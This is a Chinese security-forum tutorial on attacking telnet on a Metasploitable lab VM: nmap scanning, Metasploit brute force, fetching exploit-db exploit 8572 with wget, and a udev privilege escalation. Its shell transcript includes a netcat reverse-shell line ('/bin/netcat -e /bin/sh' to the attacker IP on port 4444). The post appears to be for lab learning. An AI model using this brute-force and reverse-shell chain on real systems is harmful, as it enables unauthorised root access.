安全矩阵

 找回密码
 立即注册
搜索
查看: 2389|回复: 0

Telnet扫描 爆破 提权三部曲

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-7-5 09:13:59 | 显示全部楼层 |阅读模式
原文链接:Telnet扫描 爆破 提权三部曲

本篇文章主要讲telnet登录提权的方法 首先先简单了解一下telnet协议是什么
Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议。Telnet协议的目的是提供一个相对通用的,双向的,面向八位字节的通信方法,允许界面终端设备和面向终端的过程能通过一个标准过程进行互相交互。应用Telnet协议能够把本地用户所使用的计算机变成远程主机系统的一个终端,默认端口23。
渗透思路大致如下:
先用nmap扫描目标主机23号端口是否开启,再用Metasploit中的auxiliary中的辅助模块进行暴力破解,拿到shell后,再在kali端搭建一个apache站点,将exploit-db上所用的EXP下载到网站根目录,再到靶机上用wget从kali上下载对应的EXP,并进行编译运行。最后再kali上用nc开启一个4444的监听端口来获取连接即可。
测试环境:
攻击机:kali liunx IP:172.16.1.104
靶机:Metasploitable IP:172.16.1.106
1.在kali上使用nmap扫描目标23号端口

已经开启
2.使用metasploit中的模块进行暴力破解

破解成功
3.在本地搭建apache站点并下载对应EXP

EXP链接:www.exploit-db.com/download/8572
4.开启nc在本地4444端口的监听

5.在靶机的shell上下载EXP并编译拿shell

由图可见编译失败,还需要进行一些修改

  1. msfadmin@metasploitable:~$ echo '#!/bin/sh' > /tmp/run
  2. echo '#!/bin/sh' > /tmp/run
  3. msfadmin@metasploitable:~$
  4. msfadmin@metasploitable:~$ echo '/bin/netcat -e /bin/sh 172.16.1.104 4444' >> /tmp/run
  5. <echo '/bin/netcat -e /bin/sh 172.16.1.104 4444' >> /tmp/run                 
  6. msfadmin@metasploitable:~$
  7. msfadmin@metasploitable:~$ ps -edf | grep udev
  8. ps -edf | grep udev
  9. root      2789     1  0 07:09 ?        00:00:00 /sbin/udevd --daemon
  10. msfadmin  5572  5539  0 09:15 pts/3    00:00:00 grep udev
复制代码

这里注意最后运行exploit的时候,一定要用root权限的pid值再减1运行6.nc成功拿到shell



回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 08:57 , Processed in 0.013445 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表